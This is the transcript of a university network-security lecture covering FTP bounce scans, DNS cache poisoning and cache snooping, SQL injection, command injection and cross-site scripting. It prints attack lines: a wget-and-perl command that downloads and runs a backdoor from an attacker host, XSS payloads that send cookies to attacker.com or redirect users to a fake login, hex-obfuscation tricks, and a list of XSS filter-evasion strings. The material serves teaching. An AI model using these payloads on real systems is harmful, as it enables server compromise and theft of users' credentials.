Transcript Passive FTP
Application Layer Security
Lecture 8
Supakorn Kungpisdan
[email protected]
NETE4630
1
Outline
FTP Security
DNS Security
Web Application Security
NETE4630
2
FTP Security Issues
All traffic is transmitted in clear text
Weak configuration on FTP allows brute force and
dictionary attacks
Anonymous access may be enabled to FTP server
If file permissions are not set, an anonymous user may be
able to read, overwrite, or delete files, leading to loss of
confidentiality, integrity, and availability of data
If anonymous access is being used on a server, make sure
that the proper restrictions are enforced for this user
NETE4630
3
Types of FTP
Active FTP
Control connection is initiated by FTP client
Data connection is initiated by FTP server
Passive FTP
Control connection is initiated by FTP client
Data connection is initiated by FTP client
NETE4630 Advanced Network Security and Implementation
4
Active FTP
1. The client connects from a random unprivileged port (N >
1023) to the FTP server's command port, port 21. The
client also sends the FTP command PORT N+1 from
port N to port 21 at the FTP server. The client then starts
listening to port N+1
2. Server returns the response from port 21 to port N at the
client
3. The server will then connect back to the client's specified
data port from its local data port (port 20) to the client at
port N+1
Ref: http://slacksite.com/other/ftp.html
NETE4630
5
Active FTP (cont.)
debug
Client port = (14*256)+178
= 3762
Letters in red shows client input
Letters in black shows server output
NETE4630
6
Active FTP (cont.)
1.
The client's command port contacts the server's command port
(port 21) and sends the command PORT 1027 (N+1).
2.
The server sends an ACK back from its port 21 to the client's
command port (port 1026 port N).
the server initiates a connection on its local data port (port 20) to
the data port the client specified earlier (port 1027).
The client sends an ACK back from port 1027 to the server port 20.
3.
4.
NETE4630
7
Firewall VS Active FTP
From the server-side firewall's standpoint, to support active
mode FTP the following communication channels need to
be opened:
FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1023 (Server responds to client's
control port)
FTP server's port 20 to ports > 1023 (Server initiates data
connection to client's data port)
FTP server's port 20 from ports > 1023 (Client sends ACKs to
server's data port)
NETE4630
8
Problems of Active FTP
The FTP client doesn't make the actual connection to the
data port of the server
The FTP client simply tells the server what port it is
listening on (N+1) and waits for the server to connect back
to the specified port on the client.
From the client-side stateful firewall, this appears to be an
outside system initiating a connection to an internal client
This connection may be blocked
Because the server initiates the data connection, the
server may connects to different client
NETE4630
9
Passive FTP
To solve the problem of active FTP, use passive FTP
When opening an FTP connection, the client opens two random
unprivileged ports locally (N>1023 and N+1).
The port N contacts the server on port 21, but instead of then
issuing a PORT command and allowing the server to connect
back to its data port, the client will issue the PASV command.
The server then opens a random unprivileged port (P > 1023)
and sends the PORT P command back to the client.
The client then initiates the connection from port N+1 to port P
on the server to transfer data.
NETE4630
10
Passive FTP (cont.)
Client port = (195*256)+149
= 50069
Server specifies
port number
NETE4630
11
Passive FTP
1. The client contacts the server on the command port (port N=1026)
and issues the PASV command.
2. The server then replies with PORT 2024, telling the client which
port it is listening to for the data connection.
3. The client then initiates the data connection from its data port
(N+1=1027) to the specified server data port (port 2024).
4. The server sends back an ACK (from its port 2024) to the client's
data port (port 1027).
You can see that client initiates data connection with FTP server
will not be blocked by the firewall
NETE4630
12
Firewall VS Passive FTP
From the server-side firewall's standpoint, to support
passive FTP, the following communication channels need
to be opened:
FTP server's port 21 from anywhere (Client initiates connection)
FTP server's port 21 to ports > 1023 (Server responds to client's
control port)
FTP server's ports > 1023 from anywhere (Client initiates data
connection to random port specified by server)
FTP server's ports > 1023 to remote ports > 1023 (Server sends
ACKs (and data) to client's data port)
NETE4630
13
Problems of Passive FTP
The FTP server needs to allow remote connection to high
numbered ports on the server.
Fortunately, many FTP daemons, including the popular WUFTPD allow the administrator to specify a range of ports which
the FTP server will use.
Some FTP clients do (or do not) support passive mode.
NETE4630
14
FTP Bounce Scan
The FTP bounce attack uses a third workstation to act as a
proxy between the nmap host and the destination station.
With passive FTP, a user could send a PORT command
to an FTP server that would direct the data towards a
completely different host!
The FTP bounce attack takes advantage of these poorlyconfigured FTP servers (no control over ranges of FTP
ports)
The data is BOUNCED from FTP server to target host
NETE4630
15
FTP Bounce Scan (cont.)
Closed port
Open port
NETE4630
16
Advantages of FTP Bounce Scan
FTP bounce attack can scan "through" a firewall.
The FTP bounce attack uses standard FTP functionality.
Nmap does not require specialized packet configurations
or changes to the FTP protocol.
Therefore, the FTP bounce attack does not require any
privileged access.
NETE4630
17
Disadvantages of FTP Bounce Scan
FTP bounce attack relates to the availability of an FTP
server that allows a PORT command to redirect the data
connection to a third device.
Most FTP servers have their default configuration to
protect against this use of the PORT command
NETE4630
18
Other FTP Bounce Attack
When using active FTP, a client uses the PORT command
to specify the IP address and port number that the server
should connect to for data connection
An attacker with access to an FTP server can bounce
through the server by specifying someone else’s IP
address
NETE4630
19
Outline
FTP Security
DNS Security
Web Application Security
NETE4630
20
Domain Name System
DNS is a distributed database that holds information for mapping
between host names to IP addresses
DNS uses both UDP and TCP.
UDP is typically used for queries, unless the lookup or response is greater
than 512 bytes
TCP is used for lookups and for zone transfer
Integrity and availability of DNS is critical for the health of the
Internet. It is used in conjunction with almost every other protocol on
the Internet
Availability was considered while designing DNS, however, security
was not
NETE4630
21
DNS Request
NETE4630
22
DNS Response
NETE4630
23
DNS Lookup Process
1
2
Host A
Host A’s
Authoritative
name server
1. Host A sends a request to resolver (at host A). It checks
the local cache and may check hosts file
2. The resolver at Host A forwards the request to its
authoritative name server
NETE4630
24
DNS Non-recursive Query
1
Host A’s
Authoritative
name server
2
3
4
Host A
Host B’s
Authoritative
name server
Host B
5
3. Find the address of authoritative name server of the
requested domain and returns its address to the resolver
NETE4630
25
DNS Recursive Query
1
2
Host A’s
Authoritative
name server
5
3
Host A
Host B’s
Authoritative
name server
4
Host B
3. The server finds the address of authoritative name
server of the requested domain, passes the request on to
the server, and returns a response to the resolver
NETE4630
26
DNS Recursive Query (cont.)
NETE4630 Advanced Network Security and Implementation
27
DNS Hierarchy (Recursive Query)
.com
TLD server
5
4
3
1. Recursive query
2. non-recursive query
6
2
7
What happens if (2) is
recursive query?
1
8
NETE4630
28
DNS Utilities
Most OSes come with a tool called nslookup, capable
of querying DNS servers for various types of information
The dig tool coming with UNIX has similar capabilities
NETE4630
29
Name-to-IP Lookup
NETE4630
30
MX Lookup with nslookup
NETE4630
31
DNS Security Issues
DNS is lack of authentication and integrity checking
Due to the lack of authentication, attackers can spoof DNS
messages to perform a variety of attacks
Due to the lack of integrity checking, attackers can
intercept and modify messages in transit
NETE4630
32
DNS Zone Transfer
For redundancy, administrators deploy both primary and
secondary name servers that contain the same DBs
To keep the DBs synchronized with the primary name
server, the secondary name server periodically connects to
the primary name server on port 53/TCP and grabs the
DNS records
This process is called a Zone Transfer
NETE4630
33
DNS Information Gathering
DNS can provide a great deal of information about the target
network and its hosts
One of the common insecure configurations with DNS is allowing
anyone to perform zone transfers on one of a domain’s DNS
servers
If an attacker can perform a zone transfer with the primary or
secondary name servers for a domain, he/she will be able to view all
DNS records for that domain
See a demo at http://www.mindterra.com/blog/?p=179
Solved by specifying IP address that is allowed to perform the zone
transfer or using Transaction Signature (TSIG)
NETE4630
34
DNS Cache Poisoning
Both DNS client and servers cache responses for a period of time in
order to increase performance and reduce network traffic
If an attacker can spoof a response for a DNS request, he/she may
be able to contaminate the DNS cache with an incorrect record
This process is known as DNS cache poisoning
The only real defense built into DNS is the use of a random
Transaction ID and source port
Some versions of BIND use Transaction IDs that are not sufficiently
random, and some use sequential Transaction IDs
BIND 9 Cache Poisoning
NETE4630
35
DNS Cache Poisoning Example
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
NETE4630 Advanced Network Security and Implementation
36
How to Check for the Vulnerability
To see if one's own DNS server has a DNS cache
poisoning vulnerability, the operator should ask three
questions. If any of them are positive, the DNS cache
server is left unpatched or has a problem in its
configuration.
Port number used by DNS queries is not randomized
ID number used for DNS queries is not randomized
DNS server is allowed to reply to recursive DNS queries
originated from the outside
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
NETE4630 Advanced Network Security and Implementation
37
Checking Port Randomness
If randomization of the port number used by DNS
queries is insufficient, the risk of the server getting
poisoned becomes higher.
Try a web-based DNS Randomness test tool
https://www.dns-oarc.net/oarc/services/dnsentropy
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
NETE4630 Advanced Network Security and Implementation
38
Web-based DNS Randomness Test
NETE4630 Advanced Network Security and Implementation
39
Web-based DNS Randomness Test (cont.)
NETE4630 Advanced Network Security and Implementation
40
Check Transaction ID Randomness
If randomization of the ID number for DNS queries is insufficient, the
risk of the server getting poisoned becomes higher.
NETE4630 Advanced Network Security and Implementation
41
Checking Recursive Query Replies
Essentially, a DNS server (DNS content server) should not
reply to recursive DNS queries originated from the outside.
Even if the server also acts as a DNS cache server, it
should be limited to those originated within the domain.
The operator could use the “Cross-Pollination Scan” tool
by IANA to check the DNS server for the issue C.
Specify the domain name(s) owned by the organization
and send a test query
http://recursive.iana.org/
http://www.ipa.go.jp/security/english/vuln/200809_DNS_en.html
NETE4630 Advanced Network Security and Implementation
42
Checking Recursive Query Replies
NETE4630 Advanced Network Security and Implementation
43
DNS Cache Snooping
Recursion bit tells the DNS server whether it is recursive
or non-recursive query
The remote DNS server may answer to queries for 3rd
party domains which do not have the recursion bit set.
This may allow a remote attacker to determine which
domains have recently been resolved via this name server,
and therefore which hosts have been recently visited.
Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf
NETE4630
44
Possible Scenario
If an attacker was interested in whether your company
utilizes the online services of a particular bank, they can
use this attack to build a statistical model regarding
company usage of the bank mentioned above.
This attack can also be used to find B2B partners, websurfing patterns, external mail servers, and more...
Two techniques are available: using non-recursive queries
and using recursive queries
Some DNS allows both types of queries, but some allows
only recursive queries to be made
NETE4630
45
DNS Cache Snooping with
Non-recursive Queries
Attacker queries to ns1.tvcabo.pt for www.sidestep.pt
ns1.tvcabo.pt does not have the entry
in local cache. It returns no answer, but
gives a list of .pt TLD name server for
further question
NETE4630
46
DNS Cache Snooping with
Non-recursive Queries (cont.)
The fact that ns1.tvcabo.pt does not have the entry
in local cache means that all hosts under
ns1.tvcabo.pt never communicates with
www.sidestep.pt before.
Thus, this organization does not use services provided by
www.sidestep.pt
NETE4630
47
DNS Cache Snooping with
Non-recursive Queries (cont.)
If the attacker executes the same query, check the response
For this time, ns1.tvcabo.pt caches the entry, so it
returns the answer
NETE4630
48
DNS Cache Snooping with Recursive
Queries
Used to determine with some degree of precision (not
100% sure) whether a given record is present in the cache
However, this will pollute the cache
If a given record is not present in the cache, it will be after
the first query is made
This is because recursive query will always return the
answer for the given record
NETE4630
49
DNS Cache Snooping with Recursive Queries
Try to see if www.sidestep.pt was cached in
ns1.tvcabo.pt
Query ns1.tvcabo.pt for www.sidestep.pt and record
the TTL
NETE4630
50
DNS Cache Snooping with Recursive Queries
(cont.)
Then query to ns.sidestep.pt (Sidestep.com’s authoritative DNS) for
www.sidestep.com and compare TTL
NETE4630
51
DNS Cache Snooping with Recursive
Queries (cont.)
TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is
much lower than the initial TTL (86400) (the TTL at
ns.sidestep.pt)
This is a good indicator that the answer was already cached at
ns1.tvcabo.pt
Another way to look for cached responses is to observe the time that
the query takes to process.
If the query time is approximately equal to the round trip time (RTT)
of a packet to the server, then the answer might have been already
present in the cache.
NETE4630
52
A Safer BIND Configuration
NETE4630
53
Outline
FTP Security
DNS Security
Web Application Security
NETE4630
54
Attacking Web Applications
The majority of vulnerabilities are caused by a lack of
proper input validation by the application before processing
user-supplied data
This can allow attackers to disclose information about the
site, steal information from backend DBs, or execute
binary code on the web server
NETE4630
55
SQL Injection
Many web applications rely on backend DBs for information storage
and retrieval.
Sometimes a script will perform a DB query using input supplied
from a web page, without verifying that the input does not contain
any escape characters
Consider the following:
Query = “SELECT * FROM users WHERE username =
‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”;
“SELECT * FROM users WHERE username = ‘bob’ AND
password = ‘ ’ OR 1=1 ”;
NETE4630
56
Code Injection
Sometimes user-supplied strings are not properly checked for
escape characters before being passed to commands as arguments
Consider a PHP script that takes a string supplied from web page
form and passes it to the nslookup utility
NETE4630
57
Code Injection (cont.)
If supply ;ls / -la, the script will execute the command
nslookup;la / -la, resulting in a listing of the root directory
being printed out
NETE4630
58
Code Injection (cont.)
wget and perl commands could be used to download and run a
backdoor on the web server by supplying the following line to the
script
;wget http://attackersite/backdoor.pl;perl
backdoor.pl
NETE4630
59
Cross-Site Scripting (XSS)
XSS vulnerabilities allow attackers to inject code or HTML into a web
page that will be executed when a different user visits that page
These attacks target visitors to a web site, not the site itself, and
occur when a web page does not properly sanitize user input before
using it in output
As a matter of fact in vulnerable websites is possible to execute
HTML and JavaScript codes from a not sanitized form, which
combined can be really dangerous: it's possible to steal cookies or
to redirect web pages to build fake login in order to steal login
usernames and passwords.
NETE4630
60
Types of XSS
The term XSS is actually a bit elusive because it includes
different kinds of attacks that stands each other on
different attacking mechanisms.
There are actually three types of Cross-Site Scripting,
commonly named as:
DOM-Based XSS
Non-persistent XSS
Persistent XSS
Ref: http://www.milw0rm.com/papers/146
http://en.wikipedia.org/wiki/Cross_Site_Scripting
NETE4630
61
DOM-based XSS
DOM-based or Type 0 XSS vulnerability, also referred to
as local XSS, is based on the standard object model for
representing HTML or XML called the Document Object
Model or DOM for short.
The DOM-Based XSS allows to an attacker to work not on
a victim website but on a victim local machine
NETE4630
62
DOM-based XSS (cont.)
Hacker executes command on the
downloaded page with user’s
privilege on the machine
Attacker creates website
containing malicious code
User downloads malicious
page by clicking on a link in an
email, etc.
NETE4630 Advanced Network Security and Implementation
63
DOM-based XSS (cont.)
1. The attacker creates a well-built malicious website - The
ingenuous user opens that site
2. The user has a vulnerable page on his machine
3. The attacker's website sends commands to the vulnerable
HTML page
4. The vulnerable local page execute that commands with
the user's privileges on that machine
5. The attacker easily gain control on the victim computer.
NETE4630
64
DOM-based XSS Solutions
DOM-based XSS is really dangerous because it operates
on the victim system strictly and as long as the user
doesn't look after his/her security issues and doesn't apply
updates, the DOM-Based XSS will work fine.
To prevent this kind of attacks there are only two things to
take care of:
Do not visit untrusted website
Keep your system up to date
NETE4630
65
Non-persistent XSS
The non-persistent or Type 1 XSS is also referred to as a
reflected vulnerability, and is by far the most common
type.
It shows up when data provided by a web client is used
immediately by server-side scripts to generate a page of
results for that user.
If unvalidated user-supplied data is included in the
resulting page without HTML encoding, this will allow
client-side code to be injected into the dynamic page
The attacker could provide some malicious code and try to
make the server execute it in order to obtain some result.
NETE4630
66
Non-persistent XSS: Search Engine
Attacker writes some arbitrary HTML code in the search
textbox and, if the website is vulnerable, the result page
will return the result of these HTML entities.
If this happens at 99% the Search engine will execute also
JavaScript arbitrary code.
NETE4630
67
Non-persistent XSS Example:
Search Engine
1. Assure that a website works like this:
http://www.example.com/search.php?text=TEXTTOSEAR
CH
2. Try to include some HTML tags in the "text" variable:
http://www.example.com/search.php?text=<img
src="http://attacker.com/image.jpg">
If the website is vulnerable it will display the attacker's
image into the result webpage.
NETE4630
68
Example (cont.)
3. Try then to write some JavaScript code:
http:///www.example.com/search.php?text=<script>
alert(document.cookie)</script>
Probably the website will return an alert popup with the
current Cookie for the site itself.
NETE4630
69
Example (cont.)
This vulnerability can be used by the attacker to steal information to
users of the victim website providing them for example an email with
an URL like:
http://www.victim.com/search.php?text=MALICIOUSCODE
To make that url less suspicious it will be useful to encode the code
in URL Hex value
For example the code: <script>alert("XSS")</script> Encoded will
look like:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%
22%29%3B%3C %2F%73%63%72%69%70%74%3E
NETE4630
70
Example (cont.)
And as comes the malicious url will turn from:
http://www.victim.com/search.php?text=<script>aler
t("XSS")</script>
Into:
http://www.victim.com/search.php?text=%3C%73%63%72
%69%70%74%3E%61%6C%65%72%74%28%22
%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Which, for a clueless user, it's lot less suspicious than the first one.
NETE4630
71
Example (cont.)
http://www.victim.com/search.php?text=%3C%73%63%72%69%70
%74%3E%61%6C%65%72%74%28%22
%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Fake login
The fake login steals the username and
password of the victim
NETE4630 Advanced Network Security and Implementation
72
Example (cont.)
1.
The attacker realizes that the victim website is vulnerable to XSS
2.
The attacker creates on his website an ad-hoc page which is used to steal
sensible information, e.g. Cookies, or to make a fake login of the victim website.
3.
The attacker provides to a user a crafted URL containing a malicious code like:
http://www.victim.com/search.php?text=
<script>document.location("http://attackersite.com/fake
login.php")</script>
Encoded in Hex.
4.
The user visits the web page and is obscurely redirect the attacker's fakelogin
5.
The user is invited to log into the system and he does.
6.
The fake login steals the username and password of the victim.
NETE4630
73
Persistent XSS
The persistent XSS is similar to non-persistent XSS
Both works on a victim site and tries to hack user information
However, attacker doesn't need to provide the crafted URL to the
users
Because the website itself permits to users to insert fixed data into
the system
This is the case for example of "guestbooks"
Usually the users use that kind of tool to leave messages to the
owned of the website
An attacker can insert some malicious code in his message and let
ALL visitors to be victim of that.
NETE4630
74
Persistent XSS (cont.)
Attacker posts the following code:
<img src="javascript:document.location
('http://attacker.com/steal.php?cookie=' .
encodeURI(document.cookie));">
Attacker can steal the user’s cookies
or steal session
NETE4630 Advanced Network Security and Implementation
75
Exploit Scenario
1. Bob hosts a web site allowing users to post messages and other
content to the site for later viewing by other members.
2. Mallory notices that Bob's website is vulnerable to a type 2 XSS
attack.
3. Mallory posts a message, controversial in nature, which may
encourage many other users of the site to view it.
4. Upon merely viewing the posted message, site users' session
cookies or other credentials could be taken and sent to Mallory's
web server without their knowledge.
5. Later, Mallory logs in as other site users and posts messages on
their behalf....
NETE4630
76
Exploit Scenario (cont.)
This works when the tool provided (the guestbook in the example)
doesn't do any check on the content of the inserted message: it just
inserts the data provided from the user into the result page.
The attacker could easily insert as much code as he wants into the
tool, for example:
<img src="javascript:document.location
('http://attacker.com/steal.php?cookie=' .
encodeURI(document.cookie));">
This allows the attacker to steal the cookie of the victim user.
NETE4630
77
More about XSS
In order to make the attack less suspicious it's possible to
"obfuscate" the IP address of the attacker's website, encoding the
IP address with three formats:
Dword Address
Hex Address
Octal Address
For example the IP address 127.0.0.1 will look like:
Dword: 2130706433
Hex: 0x7f.0x00.0x00.0x01
Octal: 0177.0000.0000.0001
Try for example: http://0x7f.0x00.0x00.0x01/ and it
will open your localhost web server.
NETE4630
78
Possible XSS Cheats
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG
SRC="javascri
0;t
:alert('PL&#
x41;YH
ACK.NET')">
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<IMG DYNSRC="javascript:alert('XSS')">
NETE4630
79
Possible XSS Cheats (cont.)
<IMG DYNSRC="javascript:alert('XSS')"> <BR
SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image:
url(javascript:alert('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE
type="text/css">BODY{background:url("javascript:alert('
XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A
HREF="javascript:document.location='http://www.example.
com/'">XSS</A>
NETE4630
80
Information Disclosure
An error page can discloses the path of thee web server’s root
directory
The path disclosure can aid attackers performing reconnaissance on
the site
phpinfo.php, part of a default PHP install, is a script providing
the OS and software version on the host and other related
information
Google for inurl:phpinfo.php to see exactly how much
information is leaked
NETE4630
81
Question?
Next week
People Layer Security
NETE4630
82
Questions
1. Find out how to configure a firewall to allow:
1. Active FTP
2. Passive FTP
2. Suggest a technique to ensure authentication and
integrity to DNS
NETE4630 Advanced Network Security and Implementation
83